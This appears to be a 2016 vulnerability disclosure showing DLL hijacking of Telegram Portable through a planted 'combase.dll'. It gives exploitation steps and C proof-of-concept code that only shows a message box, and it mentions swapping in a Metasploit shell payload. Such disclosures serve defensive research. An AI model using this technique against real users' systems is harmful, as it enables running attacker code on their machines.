Telegram Portable DLL Hijacking combase.dll
Posted on 30 November -0001
<HTML><HEAD><TITLE>Telegram Portable DLL Hijacking (combase.dll )</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: Telegram Portable DLL Hijacking (combase.dll ) # Date: 29-8-2016 # Author: Ashiyane Digital Security Team # Vendor Homepage: https://telegram.org/ # Software Link: https://telegram.org/dl/desktop/win_portable # Tested on: Windows 7 ####################################################################################### Vuln DLL: combase.dll Telegram.exe will search for an load any DLL named "combase.dll". If an attacker can place the DLL in a location where victim open Telegram.exe it will load and run the attackers DLL and code. also can generate a msfpayload DLL and spawn a shell, for example. ####################################################################################### Exploit : 1- Save and compile below C code as 'combase.dll' to create vuln DLL 2- Place 'combase.dll' on remote share or other directory like "downloads" 3- Open Telegram.exe :DLL //gcc test.c -o combase.dll -shared //this dll show a message box #include <windows.h> #define DllExport __declspec (dllexport) BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; } int dll_hijack() { MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK); return 0; } ################# Discovered By : Amir.ght ################# </BODY></HTML>
